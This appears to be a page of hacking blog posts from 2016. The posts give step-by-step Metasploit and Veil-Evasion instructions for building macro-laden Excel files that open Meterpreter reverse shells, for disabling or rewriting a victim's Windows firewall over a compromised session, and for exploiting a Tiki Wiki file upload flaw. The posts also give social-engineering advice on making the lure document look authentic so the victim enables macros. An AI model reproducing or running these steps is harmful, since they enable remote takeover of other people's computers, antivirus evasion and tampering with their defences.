Hack Remote Windows PC using Macros with Msfvenom

at 8:53 AM Tuesday, July 19, 2016 0 comments
Open metasploit framework by typing the command: and type
use windows/meterpreter/reverse_https
msf exploit (reverse_https)>set lhost 192.168.0.104 (IP of Local Host)
msf exploit (reverse_https)>set lport 443

msf exploit (reverse_https)>generate –t vba


The command generates -t vba means to generate a raw code in text formal in language visual basic.
Copy the code that comes in terminal.
Now open windows->New Microsoft Office Excel Worksheet->view (on the top bar) ->macro
Enter the macro name->create


Now select: 'This Workbook' and paste the vba code generated before and save the file as a new name and edit the document so as to make it look authentic and user should definitely enable the macros option.



Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.104
set lport 443
exploit

Now, wait for the victim to open the document and enable the macros option. As soon as he clicks on the enable macros option we will get a meterpreter session.

Labels: ,

Firewall Penetration Testing in Remote Windows PC (Part 2)

at 5:49 AM Monday, July 18, 2016 0 comments
For introduction to firewall please visit Firewall Penetration Testing – Part 1In this article we will learn how to view inbound and outbound rules of firewall in remote PC, how to delete a rule, how to allow the port on which our payload will work in future, how to stop your remote PC from being ping.


First of all let us assume that there is a blocked port in outbound rule in our remote PC:


To know which rule is enabled and disabled in our remote PC , take a session through meterepreter and bypass administrator privileges. After doing so type:
 netsh advfirewall firewall show rule=all
Once this command is executed, all the rules will be displayed :


In the above image we can see that Port 80 and Port 443 is blocked under the rule name “Block All Ports”.  So to delete that rule in the remote PC  type :
Netsh  advfirewall firewall delete rule name=”Block All Ports” 


Once this command executed, the said rule will be deleted. And you can run
netsh advfirewall firewall show rule=all
Command again to see the result :


And we can also see the result in the firewall outbound rules :

 Our normal payload works on port 4444. Now, if we want to allow port 4444 so we can upload a payload which works on port 4444, we just have to type :

Netsh advfireweall firewall add rule name=”Allow Port 4444” protocol=TCP dir=out remoteport=4444 action=allow



Once this command executed, port 4444 will be allowed on our remote PC :


Now to block stop our remote PC from being pinged we can just type :
Netsh advfirewall firewall add rule name=”All ICMPV4” dir=in action=block protocol=icmpv4


When this command will be executed, a rule blocking ping to our remote PC will created


And the following will be the result :

Labels: ,

Firewall Penetration Testing in Remote Windows PC (Part 1)

at 11:04 PM Saturday, July 16, 2016 0 comments
To play with firewall, we, first, should understand how it works.

Firewall is a network security system designed to prevent unauthorized access to or from a private network. Firewalls can be implemented in varied modes i.e. hardware, software, or a combination of both. There are many types of firewall such as Proxy firewall, Application firewall, Stateful firewall, Packet firewall, etc.

Firewalls are connected to network  and are frequently used to prevent unauthorized Internet users from accessing private networks connected to the Internet, especially intranets ensuring security. All messages entering into or leaving the intranet passes through a firewall, which examines each message and block those which do not meet the specified security criteria.

Firewall is functional on two rules which are always encircled by Inbound and outbound rules:
Inbound rules : These are the ones which filter traffic passing from the network to the local computer based on the filtering conditions specified in the rule.

Outbound rules : These are the ones which filter traffic passing from the local computer to the network based on the filtering conditions specified in the rule.

Both inbound and outbound rules can be configured to allow or block traffic as needed.
In other words we can say that Inbound rules are to do with other things accessing your computer. If you are running a Web Server on your computer then you will have to tell the Firewall that outsiders are allowed to connect to it. Further Outbound rules categorizes some programs to use the Internet yet block others. You will want to let your Web Browser (Internet Explorer, Firefox, Safari, Chrome, Opera...) have an accessibility to the Internet, so a command can be inserted which displays that Windows Firewall is allowed.


Now let us assume that the firewall of the victim's PC is enabled:

First hack The Victim PC read Here


So to turn off the firewall of victim's PC, first of all get a session through meterpreter and then take the administrator privileges of the remote PC. Move on to the shell of remote PC and write

"netsh firewall set opmode mode=disable" to turn off the firewall of remote PC.


And like this, the firewall of remote PC will be disabled.

How to Block Website in Remote PC:
We can not only turn off or on the firewall through metasploit but we can also block and allow the access to any particular port. Yes, that means we can control Inbound and Outbound rules as well. Again after having the session through meterpreter and bypassing administrative privileges and going to the shell of the remote PC just type

 "netsh advfirewall firewall add rule name="Block Ports" protocol=TCP dir=out remoteport=80 action=block".

Here,
Name = The name of the rule. (Pick something descriptive)
Protocol = The protocol we are going to block (UDP or TCP for most cases)
Dir = The direction of the block. Can be IN or OUT
Remote Port = The port of the remote host that is going to be blocked
Action = Could be block or allow. In our case we want to block the connection


Once you execute the above code, all outbound requests to any host on port 80 will be blocked, and it adds an entry to the Windows firewall:


And if you check its properties and click on 'Protocols and Ports' tab then you can see the result.


How to Block Multiple Ports
Now that we have how to block a port in remote PC, let us dig a little deeper i.e we can not only block one port but also two or more than two. And to block two to more port again take a meterpreter session as well as administrator privileges of the remote PC and just write
"netsh advfirewall firewall add rule name="Block Ports" protocol=TCP dir=out remoteport=80,443 action=block"


Once you execute the above code, all outbound requests to any host on port 80 will be blocked, and it adds an entry to the Windows firewall:


And if you check its properties and click on 'Protocols and Ports' tab then you will find that now it has blocked both port 80 and port 443:


Now, by blocking ports 80 and 443 we have blocked the HTTP and HTTPS services on the remote PC and so our victim will not be able to access any website. And the following error is displayed :



Labels: ,

Hack Web Server using Tiki Wiki Unauthenticated File Upload Vulnerability

at 8:03 AM 0 comments
This module exploits a file upload vulnerability in Tiki Wiki <= 15.1 which could be abused to allow unauthenticated users to execute arbitrary code under the context of the web server user. The issue comes with one of the 3rd party components. Name of those components is ELFinder -version 2.0-. This component comes with default example page which demonstrates file operations such as upload, remove, rename, create directory etc. Default configuration does not force validations such as file extension, content-type etc. Thus, unauthenticated user can upload PHP file. The exploit has been tested on Debian 8.x 64-bit and Tiki Wiki 15.1.

Exploit Targets
Tiki Wiki 15.1

Requirement
Attacker: kali Linux
Victim PC: Tiki Wiki 15.1


Open Kali terminal type msfconsole


Now type use exploit/unix/webapp/tikiwiki_upload_exec
msf exploit (tikiwiki_upload_exec)>set targeturi /kiki/
msf exploit (tikiwiki_upload_exec)>set rhost 192.168.0.11 (IP of Remote Host)
msf exploit (tikiwiki_upload_exec)>set rport 81
msf exploit (tikiwiki_upload_exec)>exploit          

Labels: ,

Hack Windows PC using MSoffice and Veil payload

at 5:46 AM Thursday, July 14, 2016 0 comments
Veil-Evasion is a powerful tool to generate payload executables that bypass common antivirus solutions.
To install veil-evasion on your kali linux, type :
apt-get install veil-evasion
 After the installation completes, run veil-evasion with the following command on terminal, in the installed directory of veil-evasion:
veil-evasion

To see the options of payloads type list


We can see a menu of the available payloads to use. There are plenty of payloads to use.


We will be using the payload id-24. We type the command:
use powershell/meterpreter/rev_tcp
After that set local host(Your PC’s IP). In my case it is 192.168.0.122. Hence:
set lhost  192.168.0.122
set lport 4444
And then generate the payload:
generate


Enter the name of file. Let the name of file to be generated be demo. Therefore;

>demo


Now, the Veil-Evasion tool has created a bat file in powershell code in the directory:
/var/lib/veil-evasion/output/source/demo.bat
Now, open a new terminal and open veil-evasion again( using command 'veil-evasion') and then type:
use auxiliary/macro_converter
macro_converter converts the bat file into a readable txt file. Under this, type the following commands to generate a txt file:
set POSH_BATCH /var/lib/veil-evasion/output/source/demo.bat
generate


This generates a txt file in /var/lib/veil-evasion/output directory.


Copy the code written in the generated txt file.
Now open windows->New Microsoft  Office Excel Worksheet->view(on the top bar)->macro


Then in the Macro editing area(or the workbook) copy paste the code present in “demo1.txt” to the workbook and save macro.


Now, edit the Microsoft excel worksheet so as to make it look authentic and edit it in such a way that the victim should definitely enable Macro option( given it is disabled).

Just for the case of simplicity and tutorial, I enter something random and save it as Microsoft Excel document 97-2003.

Now, all you have to do is wait for the victim to open the Excel file and enable Macros option.


Meanwhile, go to Kali Linux terminal and open metasploit framework(>msfconsole) and type the following commands:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.122
set lport 4444
exploit


Voila! As soon as victim opens the File and enable Macros option, we get a working meterpreter session.
Labels: ,
Subscribe to: Posts (Atom)